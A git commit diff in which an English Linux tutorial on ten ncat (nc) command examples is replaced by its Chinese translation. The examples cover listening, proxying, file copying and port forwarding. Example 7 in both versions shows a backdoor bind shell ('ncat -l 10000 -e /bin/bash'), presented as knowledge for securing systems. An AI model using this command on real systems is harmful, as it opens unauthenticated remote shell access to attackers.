mirror of
https://github.com/LCTT/TranslateProject.git
synced 2024-12-26 21:30:55 +08:00
翻译完毕
This commit is contained in:
parent
cbe1a9ce7a
commit
6afe8d9765
@ -1,200 +0,0 @@
|
||||
translating by lujun9972
|
||||
10 useful ncat (nc) Command Examples for Linux Systems
|
||||
======
|
||||
[![nc-ncat-command-examples-Linux-Systems](https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg)][1]
|
||||
|
||||
ncat or nc is networking utility with functionality similar to cat command but for network. It is a general purpose CLI tool for reading, writing, redirecting data across a network. It is designed to be a reliable back-end tool that can be used with scripts or other programs. It’s also a great tool for network debugging, as it can create any kind of connect one can need.
|
||||
|
||||
ncat/nc can be a port scanning tool, or a security tool, or monitoring tool and is also a simple TCP proxy. Since it has so many features, it is known as a network swiss army knife. It’s one of those tools that every System Admin should know & master.
|
||||
|
||||
In most of Debian distributions ‘nc’ is available and its package is automatically installed during installation. But in minimal CentOS 7 / RHEL 7 installation you will not find nc as a default package. You need to install using the following command.
|
||||
|
||||
```
|
||||
[root@linuxtechi ~]# yum install nmap-ncat -y
|
||||
```
|
||||
|
||||
System admins can use it audit their system security, they can use it find the ports that are opened & than secure them. Admins can also use it as a client for auditing web servers, telnet servers, mail servers etc, with ‘nc’ we can control every character sent & can also view the responses to sent queries.
|
||||
|
||||
We can also cause it to capture data being sent by client to understand what they are upto.
|
||||
|
||||
In this tutorial, we are going to learn about how to use ‘nc’ command with 10 examples,
|
||||
|
||||
#### Example: 1) Listen to inbound connections
|
||||
|
||||
Ncat can work in listen mode & we can listen for inbound connections on port number with option ‘l’. Complete command is,
|
||||
|
||||
$ ncat -l port_number
|
||||
|
||||
For example,
|
||||
|
||||
```
|
||||
$ ncat -l 8080
|
||||
```
|
||||
|
||||
Server will now start listening to port 8080 for inbound connections.
|
||||
|
||||
#### Example: 2) Connect to a remote system
|
||||
|
||||
To connect to a remote system with nc, we can use the following command,
|
||||
|
||||
$ ncat IP_address port_number
|
||||
|
||||
Let’s take an example,
|
||||
|
||||
```
|
||||
$ ncat 192.168.1.100 80
|
||||
```
|
||||
|
||||
Now a connection to server with IP address 192.168.1.100 will be made at port 80 & we can now send instructions to server. Like we can get the complete page content with
|
||||
|
||||
GET / HTTP/1.1
|
||||
|
||||
or get the page name,
|
||||
|
||||
GET / HTTP/1.1
|
||||
|
||||
or we can get banner for OS fingerprinting with the following,
|
||||
|
||||
HEAD / HTTP/1.1
|
||||
|
||||
This will tell what software is being used to run the web Server.
|
||||
|
||||
#### Example: 3) Connecting to UDP ports
|
||||
|
||||
By default , the nc utility makes connections only to TCP ports. But we can also make connections to UDP ports, for that we can use option ‘u’,
|
||||
|
||||
```
|
||||
$ ncat -l -u 1234
|
||||
```
|
||||
|
||||
Now our system will start listening a udp port ‘1234’, we can verify this using below netstat command,
|
||||
|
||||
```
|
||||
$ netstat -tunlp | grep 1234
|
||||
udp 0 0 0.0.0.0:1234 0.0.0.0:* 17341/nc
|
||||
udp6 0 0 :::1234 :::* 17341/nc
|
||||
```
|
||||
|
||||
Let’s assume we want to send or test UDP port connectivity to a specific remote host, then use the following command,
|
||||
|
||||
$ ncat -v -u {host-ip} {udp-port}
|
||||
|
||||
example:
|
||||
|
||||
```
|
||||
[root@localhost ~]# ncat -v -u 192.168.105.150 53
|
||||
Ncat: Version 6.40 ( http://nmap.org/ncat )
|
||||
Ncat: Connected to 192.168.105.150:53.
|
||||
```
|
||||
|
||||
#### Example: 4) NC as chat tool
|
||||
|
||||
NC can also be used as chat tool, we can configure server to listen to a port & than can make connection to server from a remote machine on same port & start sending message. On server side, run
|
||||
|
||||
```
|
||||
$ ncat -l 8080
|
||||
```
|
||||
|
||||
On remote client machine, run
|
||||
|
||||
```
|
||||
$ ncat 192.168.1.100 8080
|
||||
```
|
||||
|
||||
Than start sending messages & they will be displayed on server terminal.
|
||||
|
||||
#### Example: 5) NC as a proxy
|
||||
|
||||
NC can also be used as a proxy with a simple command. Let’s take an example,
|
||||
|
||||
```
|
||||
$ ncat -l 8080 | ncat 192.168.1.200 80
|
||||
```
|
||||
|
||||
Now all the connections coming to our server on port 8080 will be automatically redirected to 192.168.1.200 server on port 80\. But since we are using a pipe, data can only be transferred & to be able to receive the data back, we need to create a two way pipe. Use the following commands to do so,
|
||||
|
||||
```
|
||||
$ mkfifo 2way
|
||||
$ ncat -l 8080 0<2way | ncat 192.168.1.200 80 1>2way
|
||||
```
|
||||
|
||||
Now you will be able to send & receive data over nc proxy.
|
||||
|
||||
#### Example: 6) Copying Files using nc/ncat
|
||||
|
||||
NC can also be used to copy the files from one system to another, though it is not recommended & mostly all systems have ssh/scp installed by default. But none the less if you have come across a system with no ssh/scp, you can also use nc as last ditch effort.
|
||||
|
||||
Start with machine on which data is to be received & start nc is listener mode,
|
||||
|
||||
```
|
||||
$ ncat -l 8080 > file.txt
|
||||
```
|
||||
|
||||
Now on the machine from where data is to be copied, run the following command,
|
||||
|
||||
```
|
||||
$ ncat 192.168.1.100 8080 --send-only < data.txt
|
||||
```
|
||||
|
||||
Here, data.txt is the file that has to be sent. –send-only option will close the connection once the file has been copied. If not using this option, than we will have press ctrl+c to close the connection manually.
|
||||
|
||||
We can also copy entire disk partitions using this method, but it should be done with caution.
|
||||
|
||||
#### Example: 7) Create a backdoor via nc/nact
|
||||
|
||||
NC command can also be used to create backdoor to your systems & this technique is actually used by hackers a lot. We should know how it works in order to secure our system. To create a backdoor, the command is,
|
||||
|
||||
```
|
||||
$ ncat -l 10000 -e /bin/bash
|
||||
```
|
||||
|
||||
‘e‘ flag attaches a bash to port 10000\. Now a client can connect to port 10000 on server & will have complete access to our system via bash,
|
||||
|
||||
```
|
||||
$ ncat 192.168.1.100 1000
|
||||
```
|
||||
|
||||
#### Example: 8) Port forwarding via nc/ncat
|
||||
|
||||
We can also use NC for port forwarding with the help of option ‘c’ , syntax for accomplishing port forwarding is,
|
||||
|
||||
```
|
||||
$ ncat -u -l 80 -c 'ncat -u -l 8080'
|
||||
```
|
||||
|
||||
Now all the connections for port 80 will be forwarded to port 8080.
|
||||
|
||||
#### Example: 9) Set Connection timeouts
|
||||
|
||||
Listener mode in ncat will continue to run & would have to be terminated manually. But we can configure timeouts with option ‘w’,
|
||||
|
||||
```
|
||||
$ ncat -w 10 192.168.1.100 8080
|
||||
```
|
||||
|
||||
This will cause connection to be terminated in 10 seconds, but it can only be used on client side & not on server side.
|
||||
|
||||
#### Example: 10) Force server to stay up using -k option in ncat
|
||||
|
||||
When client disconnects from server, after sometime server also stops listening. But we can force server to stay connected & continuing port listening with option ‘k’. Run the following command,
|
||||
|
||||
```
|
||||
$ ncat -l -k 8080
|
||||
```
|
||||
|
||||
Now server will stay up, even if a connection from client is broken.
|
||||
|
||||
With this we end our tutorial, please feel free to ask any question regarding this article using the comment box below.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linuxtechi.com/nc-ncat-command-examples-linux-systems/
|
||||
|
||||
作者:[Pradeep Kumar][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linuxtechi.com/author/pradeep/
|
||||
[1]:https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg
|
@ -0,0 +1,199 @@
|
||||
10 个例子教你学会 ncat (nc) 命令
|
||||
======
|
||||
[![nc-ncat-command-examples-Linux-Systems](https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg)][1]
|
||||
|
||||
ncat 或者说 nc 是一款功能类似 cat 的网络工具。它是一款拥有多种功能的 CLI 工具,可以用来在网络上读,写以及重定向数据。 它被设计成可以被脚本或其他程序调用的可靠后端工具。 同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具。
|
||||
|
||||
ncat/nc 既是一个端口扫描工具,也是一款安全工具, 还能是一款检测工具,甚至可以做一个简单的 TCP 代理。 由于有这么多的功能,它被誉为是网络界的瑞士军刀。 这是每个系统管理员都应该知道并且掌握它。
|
||||
|
||||
在大多数 Debian 发行版中,`nc` 是默认可用的,它会在安装系统的过程中自动被安装。 但是在 CentOS 7 / RHEL 7 的最小化安装中,`nc` 并不会默认被安装。 你需要用下列命令手工安装。
|
||||
|
||||
```
|
||||
[root@linuxtechi ~]# yum install nmap-ncat -y
|
||||
```
|
||||
|
||||
系统管理员可以用它来审计系统安全,用它来找出开放的端口然后保护这些端口。 管理员还能用它作为客户端来审计 Web 服务器, 远程登陆服务器, 邮件服务器等, 通过 `nc` 我们可以控制发送的每个字符,也可以查看对方的回应。
|
||||
|
||||
我们还可以 o 用它捕获客户端发送的数据一次来了解这些客户端是做什么的。
|
||||
|
||||
在本文中,我们会通过 10 个例子来学习如何使用 `nc` 命令。
|
||||
|
||||
### 例子: 1) 监听入站连接
|
||||
|
||||
通过 `l` 选项,ncat 可以进入监听模式,使我们可以在指定端口监听入站连接。 完整的命令是这样的
|
||||
|
||||
$ ncat -l port_number
|
||||
|
||||
比如,
|
||||
|
||||
```
|
||||
$ ncat -l 8080
|
||||
```
|
||||
|
||||
服务器就会开始在 8080 端口监听入站连接。
|
||||
|
||||
### 例子: 2) 连接远程系统
|
||||
|
||||
使用下面命令可以用 nc 来连接远程系统,
|
||||
|
||||
$ ncat IP_address port_number
|
||||
|
||||
让我们来看个例子,
|
||||
|
||||
```
|
||||
$ ncat 192。168。1。100 80
|
||||
```
|
||||
|
||||
这会创建一个连接,连接到 IP 为 192。168。1。100 的服务器上的 80 端口,然后我们就可以向服务器发送指令了。 比如我们可以输入下面内容来获取完整的网页内容
|
||||
|
||||
GET / HTTP/1.1
|
||||
|
||||
或者获取页面名称,
|
||||
|
||||
GET / HTTP/1.1
|
||||
|
||||
或者我们可以通过以下方式获得操作系统指纹标识,
|
||||
|
||||
HEAD / HTTP/1.1
|
||||
|
||||
这会告诉我们使用的是什么软件来运行这个 web 服务器的。
|
||||
|
||||
### 例子: 3) 连接 UDP 端口
|
||||
|
||||
默认情况下,nc 创建连接时只会连接 TCP 端口。 不过我们可以使用 `u` 选项来连接到 UDP 端口,
|
||||
|
||||
```
|
||||
$ ncat -l -u 1234
|
||||
```
|
||||
|
||||
现在我们的系统会开始监听 udp 的'1234'端口,我们可以使用下面的 netstat 命令来验证这一点,
|
||||
|
||||
```
|
||||
$ netstat -tunlp | grep 1234
|
||||
udp 0 0 0。0。0。0:1234 0。0。0。0:* 17341/nc
|
||||
udp6 0 0 :::1234 :::* 17341/nc
|
||||
```
|
||||
|
||||
假设我们想发送或者说测试某个远程主机 UDP 端口的连通性,我们可以使用下面命令,
|
||||
|
||||
$ ncat -v -u {host-ip} {udp-port}
|
||||
|
||||
比如:
|
||||
|
||||
```
|
||||
[root@localhost ~]# ncat -v -u 192。168。105。150 53
|
||||
Ncat: Version 6。40 ( http://nmap.org/ncat )
|
||||
Ncat: Connected to 192。168。105。150:53。
|
||||
```
|
||||
|
||||
#### 例子: 4) 将 NC 作为聊天工具
|
||||
|
||||
NC 也可以作为聊天工具来用,我们可以配置服务器监听某个端口,然后从远程主机上连接到服务器的这个端口,就可以开始发送消息了。 在服务器这端运行:
|
||||
|
||||
```
|
||||
$ ncat -l 8080
|
||||
```
|
||||
|
||||
在远程客户端主机上运行:
|
||||
|
||||
```
|
||||
$ ncat 192。168。1。100 8080
|
||||
```
|
||||
|
||||
之后开始发送消息,这些消息会在服务器终端上显示出来。
|
||||
|
||||
#### 例子: 5) 将 NC 作为代理
|
||||
|
||||
NC 也可以用来做代理。比如下面这个例子,
|
||||
|
||||
```
|
||||
$ ncat -l 8080 | ncat 192。168。1。200 80
|
||||
```
|
||||
|
||||
所有发往我们服务器 8080 端口的连接都会自动转发到 192。168。1。200 上的 80 端口。 不过由于我们使用了管道,数据只能被单向传输。 要同时能够接受返回的数据,我们需要创建一个双向管道。 使用下面命令可以做到这点:
|
||||
|
||||
```
|
||||
$ mkfifo 2way
|
||||
$ ncat -l 8080 0<2way | ncat 192。168。1。200 80 1>2way
|
||||
```
|
||||
|
||||
现在你可以通过 nc 代理来收发数据了。
|
||||
|
||||
#### 例子: 6) 使用 nc/ncat 拷贝文件
|
||||
|
||||
NC 还能用来在系统间拷贝文件,虽然这么做并不推荐,因为绝大多数系统默认都安装了 ssh/scp。 不过如果你恰好遇见个没有 ssh/scp 的系统的话, 你可以用 nc 来作最后的努力。
|
||||
|
||||
在要接受数据的机器上启动 nc 并让它进入监听模式:
|
||||
|
||||
```
|
||||
$ ncat -l 8080 > file.txt
|
||||
```
|
||||
|
||||
现在去要被拷贝数据的机器上运行下面命令:
|
||||
|
||||
```
|
||||
$ ncat 192。168。1。100 8080 --send-only < data.txt
|
||||
```
|
||||
|
||||
这里,data.txt 是要发送的文件。 –send-only 选项会在文件拷贝完后立即关闭连接。 如果不加该选项, 我们需要手工按下 ctrl+c to 来关闭连接。
|
||||
|
||||
我们也可以用这种方法拷贝整个磁盘分区,不过请一定要小心。
|
||||
|
||||
#### 例子: 7) 通过 nc/ncat 创建后门
|
||||
|
||||
NC 命令还可以用来在系统中创建后门,并且这种技术也确实被黑客大量使用。 为了保护我们的系统,我们需要知道它是怎么做的。 创建后门的命令为:
|
||||
|
||||
```
|
||||
$ ncat -l 10000 -e /bin/bash
|
||||
```
|
||||
|
||||
‘e‘ 标志将一个 bash 与端口 10000 相连。现在客户端只要连接到服务器上的 10000 端口就能通过 bash 获取我们系统的完整访问权限:
|
||||
|
||||
```
|
||||
$ ncat 192。168。1。100 10000
|
||||
```
|
||||
|
||||
#### 例子: 8) 通过 nc/ncat 进行端口转发
|
||||
|
||||
我们通过选项 `c` 来用 NC 进行端口转发,实现端口转发的语法为:
|
||||
|
||||
```
|
||||
$ ncat -u -l 80 -c 'ncat -u -l 8080'
|
||||
```
|
||||
|
||||
这样,所有连接到 80 端口的连接都会转发到 8080 端口。
|
||||
|
||||
#### 例子: 9) 设置连接超时
|
||||
|
||||
ncat 的监听模式会一直运行,直到手工终止。 不过我们可以通过选项 `w` 设置超时时间:
|
||||
|
||||
```
|
||||
$ ncat -w 10 192。168。1。100 8080
|
||||
```
|
||||
|
||||
这回导致连接 10 秒后终止,不过这个选项只能用于客户端而不是服务端。
|
||||
|
||||
#### 例子: 10) 使用 -k 选项强制 ncat 待命
|
||||
|
||||
当客户端从服务端断开连接后,过一段时间服务端也会停止监听。 但通过选项 `k` 我们可以强制服务器保持连接并继续监听端口。 命令如下:
|
||||
|
||||
```
|
||||
$ ncat -l -k 8080
|
||||
```
|
||||
|
||||
现在即使来自客户端的连接断了也依然会处于待命状态。
|
||||
|
||||
自此我们的教程就完了,如有疑问,请在下方留言。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linuxtechi.com/nc-ncat-command-examples-linux-systems/
|
||||
|
||||
作者:[Pradeep Kumar][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linuxtechi.com/author/pradeep/
|
||||
[1]:https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg
|
Loading…
Reference in New Issue
Block a user